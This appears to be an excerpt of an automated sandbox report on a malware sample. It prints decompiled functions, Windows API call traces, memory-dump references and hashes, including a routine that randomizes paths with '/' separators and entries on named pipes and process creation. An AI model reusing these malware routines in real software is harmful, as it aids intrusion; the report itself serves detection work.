                              • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 3712611166-0
                              • Opcode ID: cc1f18836609f7b30ab7d05d2f175ac701fef1800549f721d05d0d7ddc7e3e48
                              • Instruction ID: a77788b53fdd943d43bc664fba29a1c1f79e43936cd08c6165c8d5e000370cca
                              • Opcode Fuzzy Hash: cc1f18836609f7b30ab7d05d2f175ac701fef1800549f721d05d0d7ddc7e3e48
                              • Instruction Fuzzy Hash: C011FF76600119BB9B21AFA5EC8CDAFBFBDFF09291B004125F9059B150DB719A419BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D484D, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E049D484D(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x49dd270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x49dd288; // 0xebf23b00
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x49dd288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                              0x049d4855
                              0x049d4858
                              0x049d485e
                              0x049d4876
                              0x049d487a
                              0x049d487d
                              0x049d487f
                              0x049d4882
                              0x049d4884
                              0x049d4887
                              0x049d4889
                              0x049d4889
                              0x049d488b
                              0x049d4896
                              0x049d489b
                              0x049d48ac
                              0x049d48b4
                              0x049d48b9
                              0x049d48bc
                              0x049d48bf
                              0x049d48c1
                              0x049d48c7
                              0x049d48ca
                              0x049d48ca
                              0x049d48ca
                              0x049d48d5
                              0x049d48da
                              0x049d48e4

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,049DA88E,00000000,?,74785520,049D64DC,?,058195B0), ref: 049D4858
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 049D4870
                              • memcpy.NTDLL(00000000,058195B0,-00000008,?,?,?,049DA88E,00000000,?,74785520,049D64DC,?,058195B0), ref: 049D48B4
                              • memcpy.NTDLL(00000001,058195B0,00000001,049D64DC,?,058195B0), ref: 049D48D5
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: memcpy$AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 1819133394-0
                              • Opcode ID: e2031716f9926a535c344d1d30f074eca041f53ba78f4ddd16eb97af6263cf9a
                              • Instruction ID: b819a7ab5112829321ffff036bf3e49fdc8c950d825823cc5f904bd67d3274ae
                              • Opcode Fuzzy Hash: e2031716f9926a535c344d1d30f074eca041f53ba78f4ddd16eb97af6263cf9a
                              • Instruction Fuzzy Hash: AD11E572A05154BFD7108FA9EC84D9EBFFEDBC0290B154276F505D7250EA74AE44C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D154C, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,053CC682,00000000,00000000), ref: 053D156A
                              • GetLastError.KERNEL32(?,?,?,053CC682,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,053C187D,?,0000001E), ref: 053D1572
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide
                              • String ID:
                              • API String ID: 203985260-0
                              • Opcode ID: e3a6239d3b13b9d36da525c3e1ff8a4b7a6449ed20cb2fca922340fd365f00c7
                              • Instruction ID: 3348f10e21bdada7c6af3a0690b52fbd46639b33da5c827764d27fe6c57ab014
                              • Opcode Fuzzy Hash: e3a6239d3b13b9d36da525c3e1ff8a4b7a6449ed20cb2fca922340fd365f00c7
                              • Instruction Fuzzy Hash: CA018477108251BF87319E66AC4CD2BFFFEFBC67A0B100B19F86296280DA249904C671
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D95A5, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?), ref: 053D95B2
                              • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 053D95D8
                              • lstrcpy.KERNEL32(00000014,?), ref: 053D95FD
                              • memcpy.NTDLL(?,?,?), ref: 053D960A
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AllocateHeaplstrcpylstrlenmemcpy
                              • String ID:
                              • API String ID: 1388643974-0
                              • Opcode ID: 00ac7656003e7552fb536b6a412a3d80b0f20d217f88b333c9ac5f78dc5ab160
                              • Instruction ID: 676a8a9fc700a2c7745d87b2eeac00415a18e4fecbeff96b78f62dd503165954
                              • Opcode Fuzzy Hash: 00ac7656003e7552fb536b6a412a3d80b0f20d217f88b333c9ac5f78dc5ab160
                              • Instruction Fuzzy Hash: 6D115B7291060AEFCB21CF58E884E9ABBF9FF48714F10855DF8468B250D775E904DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D45D5, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 053D45E8
                              • lstrlen.KERNEL32(064FBF48), ref: 053D4609
                              • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 053D4621
                              • lstrcpy.KERNEL32(00000000,064FBF48), ref: 053D4633
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                              • String ID:
                              • API String ID: 1929783139-0
                              • Opcode ID: 08b7614d76697a0fc08447c7d1f093fb263b8040d23dd77d4e52dd7920ddaa35
                              • Instruction ID: a972843697d9e29d9691ab571ad78acdcf7121a7350f2736a2224323930fa16c
                              • Opcode Fuzzy Hash: 08b7614d76697a0fc08447c7d1f093fb263b8040d23dd77d4e52dd7920ddaa35
                              • Instruction Fuzzy Hash: 8001A576504204ABC7219FADA889A5ABFFCAB49201F144068F94BDB241DA709A09C770
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E45CE, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • RtlInitializeCriticalSection.NTDLL(053F0460), ref: 053E45F2
                              • RtlInitializeCriticalSection.NTDLL(053F0440), ref: 053E4608
                              • GetVersion.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053E4619
                              • GetModuleHandleA.KERNEL32(00001597,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053E464D
                                • Part of subcall function 053DEFDA: GetModuleHandleA.KERNEL32(?,00000001,77E49EB0,00000000,?,?,00000000,053E4630,?,00000000), ref: 053DEFF2
                                • Part of subcall function 053DEFDA: LoadLibraryA.KERNEL32(?), ref: 053DF093
                                • Part of subcall function 053DEFDA: FreeLibrary.KERNEL32(00000000), ref: 053DF09E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                              • String ID:
                              • API String ID: 1711133254-0
                              • Opcode ID: 5945cae576678431af186ef6bd5e0abee8af76a3c6816f5220870e272e66648b
                              • Instruction ID: 23b520bba2f6760a5665deaf507f788a4bd9f78007170d3edb27dc81ab415498
                              • Opcode Fuzzy Hash: 5945cae576678431af186ef6bd5e0abee8af76a3c6816f5220870e272e66648b
                              • Instruction Fuzzy Hash: 1A117C76A602109BDB589FACA98E5197FECB749304F40442AF116CB282DEB468508F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DD444, Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D3763: lstrlen.KERNEL32(00000000,00000000,00000000,053DFD57,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 053D3768
                                • Part of subcall function 053D3763: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 053D377D
                                • Part of subcall function 053D3763: wsprintfA.USER32 ref: 053D3799
                                • Part of subcall function 053D3763: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 053D37B5
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 053DD472
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 053DD481
                              • CloseHandle.KERNEL32(00000000), ref: 053DD48B
                              • GetLastError.KERNEL32 ref: 053DD493
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                              • String ID:
                              • API String ID: 4042893638-0
                              • Opcode ID: 35adbb277e6d7edb49c56cf695809075bdb3304926e7af5c678dd978bba1eb03
                              • Instruction ID: a8e85532d63cc1330aa09865aac3634d15b215f7a644d1ca965a9e2986c012ea
                              • Opcode Fuzzy Hash: 35adbb277e6d7edb49c56cf695809075bdb3304926e7af5c678dd978bba1eb03
                              • Instruction Fuzzy Hash: 2BF0D1722042147AD6326A65EC8DEAFBFBDEB41760F108819F90A9D0C0CE746A5082B0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CE521, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                              Download Yara Rule
                              APIs
                              • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,053F0244,00000001), ref: 053CE545
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053CE590
                                • Part of subcall function 053C3475: CreateThread.KERNEL32(00000000,00000000,00000000,?,053F01F8,053C10B6), ref: 053C348C
                                • Part of subcall function 053C3475: QueueUserAPC.KERNEL32(?,00000000,?), ref: 053C34A1
                                • Part of subcall function 053C3475: GetLastError.KERNEL32(00000000), ref: 053C34AC
                                • Part of subcall function 053C3475: TerminateThread.KERNEL32(00000000,00000000), ref: 053C34B6
                                • Part of subcall function 053C3475: CloseHandle.KERNEL32(00000000), ref: 053C34BD
                                • Part of subcall function 053C3475: SetLastError.KERNEL32(00000000), ref: 053C34C6
                              • GetLastError.KERNEL32(Function_00012AB7,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053CE578
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053CE588
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                              • String ID:
                              • API String ID: 1700061692-0
                              • Opcode ID: 09ad526e8ffa6f6be8f1a61609a4fe913d03cde592a3cbdd104f79a14c1cabfc
                              • Instruction ID: 8159f43e8899b09d134ceebcd37cd00ab9b0b236353cc952d456381fbf47ac76
                              • Opcode Fuzzy Hash: 09ad526e8ffa6f6be8f1a61609a4fe913d03cde592a3cbdd104f79a14c1cabfc
                              • Instruction Fuzzy Hash: B9F0ADB53042106FE3265A689C4DA6A2FACEB89331F000568F616CA2C0DA744C059760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D3EE7, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcatW.KERNEL32(00000000,00001000), ref: 053D3EF9
                                • Part of subcall function 053C6D99: CreateFileW.KERNEL32(00000000,C0000000,053C23FB,00000000,053C23FC,00000080,00000000,00000000,053E8BAA,747869A0,053C23FB,?), ref: 053C6DDA
                                • Part of subcall function 053C6D99: GetLastError.KERNEL32 ref: 053C6DE4
                                • Part of subcall function 053C6D99: WaitForSingleObject.KERNEL32(000000C8), ref: 053C6E09
                                • Part of subcall function 053C6D99: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 053C6E2A
                                • Part of subcall function 053C6D99: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 053C6E52
                                • Part of subcall function 053C6D99: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 053C6E67
                                • Part of subcall function 053C6D99: SetEndOfFile.KERNEL32(00000001), ref: 053C6E74
                                • Part of subcall function 053C6D99: CloseHandle.KERNEL32(00000001), ref: 053C6E8C
                              • WaitForSingleObject.KERNEL32(00002710,00000000,00000000,?,00000005,?,053DE92E,?,00000000,00001000,00000000,00000000,00001000), ref: 053D3F1C
                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,053DE92E,?,00000000,00001000,00000000,00000000,00001000), ref: 053D3F3E
                              • GetLastError.KERNEL32(?,053DE92E,?,00000000,00001000,00000000,00000000,00001000), ref: 053D3F52
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                              • String ID:
                              • API String ID: 3370347312-0
                              • Opcode ID: ee71037618bb2f4b02b9966742725f9ec8507853af3acf1a39e73bf830342970
                              • Instruction ID: 6de3846aa8a1aaba2f4e2348100ddd3a3eda512f9b7ee1cd30d7f9b553c7e12e
                              • Opcode Fuzzy Hash: ee71037618bb2f4b02b9966742725f9ec8507853af3acf1a39e73bf830342970
                              • Instruction Fuzzy Hash: 3FF01932244209BBDB225E60EC0EFAABF7EBF05711F104514F61A9C0D0DBB599219B7A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CCF8A, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,053C556D,000000FF,064FB7F0,?,?,053D652C,0000003A,064FB7F0), ref: 053CCFA6
                              • GetLastError.KERNEL32(?,?,053D652C,0000003A,064FB7F0,?,?,?,053CFFEA,00000001,00000001,064F8578), ref: 053CCFB1
                              • WaitNamedPipeA.KERNEL32(00002710), ref: 053CCFD3
                              • WaitForSingleObject.KERNEL32(00000000,?,?,053D652C,0000003A,064FB7F0,?,?,?,053CFFEA,00000001,00000001,064F8578), ref: 053CCFE1
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                              • String ID:
                              • API String ID: 4211439915-0
                              • Opcode ID: b973d8925489a91d47d78a8033ec7244bea4deaebfe827f76155e5d285909263
                              • Instruction ID: 7d8bbe1e7d2a5783295c78b68b579c5a5d7334c9593c0ca580a7f321d4cdf5d4
                              • Opcode Fuzzy Hash: b973d8925489a91d47d78a8033ec7244bea4deaebfe827f76155e5d285909263
                              • Instruction Fuzzy Hash: 81F09032604124ABE2311B69AC4EF9A7F9AFB043B1F110565F62EEE1D0CA714C50C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D3763, Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,053DFD57,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 053D3768
                              • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 053D377D
                              • wsprintfA.USER32 ref: 053D3799
                                • Part of subcall function 053E339E: memset.NTDLL ref: 053E33B3
                                • Part of subcall function 053E339E: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000020,00000000), ref: 053E33EC
                                • Part of subcall function 053E339E: wcstombs.NTDLL ref: 053E33F6
                                • Part of subcall function 053E339E: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000020,00000000), ref: 053E3427
                                • Part of subcall function 053E339E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,053CDC52), ref: 053E3453
                                • Part of subcall function 053E339E: TerminateProcess.KERNEL32(?,000003E5), ref: 053E3469
                                • Part of subcall function 053E339E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,053CDC52), ref: 053E347D
                                • Part of subcall function 053E339E: CloseHandle.KERNEL32(?), ref: 053E34B0
                                • Part of subcall function 053E339E: CloseHandle.KERNEL32(?), ref: 053E34B5
                              • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 053D37B5
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                              • String ID:
                              • API String ID: 1624158581-0
                              • Opcode ID: 19e10884ca5c9da042ac274733b696b753008c1375536f01b8e97b26f9d93463
                              • Instruction ID: 45dbb592414a68c8e3fb1a892497514c3038f12ac745cb70a158865cd2194e77
                              • Opcode Fuzzy Hash: 19e10884ca5c9da042ac274733b696b753008c1375536f01b8e97b26f9d93463
                              • Instruction Fuzzy Hash: 5EF09AB2210114ABD262172DBC0EF6B7FBEEBC1B24F050121F902DE2D1DE609D0587B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D9FCB, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(064FC0A0), ref: 053D9FD4
                              • Sleep.KERNEL32(0000000A,?,053D94CE,00000000,00000000,053C4FAB,?,00000000), ref: 053D9FDE
                              • HeapFree.KERNEL32(00000000,?,?,053D94CE,00000000,00000000,053C4FAB,?,00000000), ref: 053DA006
                              • RtlLeaveCriticalSection.NTDLL(064FC0A0), ref: 053DA024
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID:
                              • API String ID: 58946197-0
                              • Opcode ID: 9cd939e7f4aa8a8e8d5a2079080c66196717de72b5250fc9ad6f8f57f4a949ee
                              • Instruction ID: d60c2015202edab6b6936968ba575cb4b1829189f2e4c3fc357ca57b0a862b31
                              • Opcode Fuzzy Hash: 9cd939e7f4aa8a8e8d5a2079080c66196717de72b5250fc9ad6f8f57f4a949ee
                              • Instruction Fuzzy Hash: 07F03A722602019FD725DF68ED4EF16BFFDEB00302F008405B546DE292CA70D814DB25
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D5C2B, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D5C2B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x49dd2a4; // 0x2e0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x49dd2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x49dd2a4; // 0x2e0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x49dd270; // 0x5420000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                              0x049d5c2b
                              0x049d5c32
                              0x049d5c7c
                              0x049d5c7e
                              0x049d5c7e
                              0x049d5c36
                              0x049d5c3c
                              0x049d5c41
                              0x049d5c45
                              0x049d5c4b
                              0x049d5c52
                              0x00000000
                              0x00000000
                              0x049d5c54
                              0x049d5c59
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049d5c59
                              0x049d5c5b
                              0x049d5c63
                              0x049d5c66
                              0x049d5c66
                              0x049d5c6c
                              0x049d5c73
                              0x049d5c76
                              0x049d5c76
                              0x00000000

                              APIs
                              • SetEvent.KERNEL32(000002E0,00000001,049D4170), ref: 049D5C36
                              • SleepEx.KERNEL32(00000064,00000001), ref: 049D5C45
                              • CloseHandle.KERNEL32(000002E0), ref: 049D5C66
                              • HeapDestroy.KERNEL32(05420000), ref: 049D5C76
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: CloseDestroyEventHandleHeapSleep
                              • String ID:
                              • API String ID: 4109453060-0
                              • Opcode ID: 2c0289130b092f94633158ea93272af4631b4f4f0780b0e10ede671ffecf8c72
                              • Instruction ID: 2efa4975674a04512912207c8b747476aba514df95e6e6371e6f7a672eb2f177
                              • Opcode Fuzzy Hash: 2c0289130b092f94633158ea93272af4631b4f4f0780b0e10ede671ffecf8c72
                              • Instruction Fuzzy Hash: CEF01C7570A212ABEB206E75D94CB063EECEB147617064634FA45E7180CA28EC81C660
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D3A79, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memorytimeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D3A79(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E049D65F6(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000;
					_t20 = E049D6B4F(__ecx, _a4, _a8, _t23);
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E049D6E41(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x49dd270, 0, _t23);
				}
				return _t20;
			}









                              0x049d3a79
                              0x049d3a8a
                              0x049d3a8e
                              0x049d3ae7
                              0x049d3a90
                              0x049d3a97
                              0x049d3a9d
                              0x049d3aa6
                              0x049d3aaa
                              0x049d3ab0
                              0x049d3ac0
                              0x049d3ad2
                              0x049d3ad2
                              0x049d3add
                              0x049d3add
                              0x049d3aee

                              APIs
                                • Part of subcall function 049D65F6: lstrlen.KERNEL32(?,00000000,05819B78,00000000,049D25B8,05819D56,69B25F44,?,?,?,?,69B25F44,00000005,049DD00C,4D283A53,?), ref: 049D65FD
                                • Part of subcall function 049D65F6: mbstowcs.NTDLL ref: 049D6626
                                • Part of subcall function 049D65F6: memset.NTDLL ref: 049D6638
                              • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,058193AC), ref: 049D3AB0
                              • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,058193AC), ref: 049D3ADD
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                              • String ID: Uxt
                              • API String ID: 1500278894-1536154274
                              • Opcode ID: 26fc1cd96a0d94e5aef01d17cc02d8c7b87ec65b02e074c9f493f45a270d4f5d
                              • Instruction ID: 348517db89e8067898800a130a003e7c3ec97ad37a69c88acd79afa94d9e77ac
                              • Opcode Fuzzy Hash: 26fc1cd96a0d94e5aef01d17cc02d8c7b87ec65b02e074c9f493f45a270d4f5d
                              • Instruction Fuzzy Hash: 92012832204209BBEF216F98DC44E9B7FBDEB84714F008035FE44AA150EB71E968D761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D2F09, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(?,?,?), ref: 053D2F4D
                              • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 053D2F5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: memcpy
                              • String ID: 0x
                              • API String ID: 3510742995-3225541890
                              • Opcode ID: 975ba20c25a70357f9e1009cf18dd8b4ef84759b7f3b92eb78dfac63a78d9f3a
                              • Instruction ID: 1b59925cd4bc7e65f6423ffb409f3755ca905b310ee8db166f53ee92ba7a453d
                              • Opcode Fuzzy Hash: 975ba20c25a70357f9e1009cf18dd8b4ef84759b7f3b92eb78dfac63a78d9f3a
                              • Instruction Fuzzy Hash: 91015E3AA10119ABDB11DAA8D8059AFFBBDFB44344F104515F904E7140EBB09A09C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C9449, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D3D4D: lstrlen.KERNEL32(00000000,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3DA6
                                • Part of subcall function 053D3D4D: lstrlen.KERNEL32(?,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3DC4
                                • Part of subcall function 053D3D4D: RtlAllocateHeap.NTDLL(00000000,74786985,?), ref: 053D3DED
                                • Part of subcall function 053D3D4D: memcpy.NTDLL(00000000,00000000,00000000,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3E04
                                • Part of subcall function 053D3D4D: HeapFree.KERNEL32(00000000,00000000), ref: 053D3E17
                                • Part of subcall function 053D3D4D: memcpy.NTDLL(00000000,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3E26
                              • GetLastError.KERNEL32 ref: 053C94E8
                                • Part of subcall function 053CA23E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 053CA2EC
                                • Part of subcall function 053CA23E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 053CA310
                                • Part of subcall function 053CA23E: HeapFree.KERNEL32(00000000,00000000,?,00000000,053F01F4,?,?,053C121E,?,00000000,?,?), ref: 053CA31E
                              • HeapFree.KERNEL32(00000000,?), ref: 053C9504
                              • HeapFree.KERNEL32(00000000,?), ref: 053C9515
                              • SetLastError.KERNEL32(00000000), ref: 053C9518
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                              • String ID:
                              • API String ID: 2451549186-0
                              • Opcode ID: 3bcd91d57a738340d0b34d0d07b2542211db1dcfc52b46d720a9a0cd8b36588b
                              • Instruction ID: 7dcaaaac9a8035c9c55ab0e5a87f282a7e24e9d6c158129de55bc75e3ca719b2
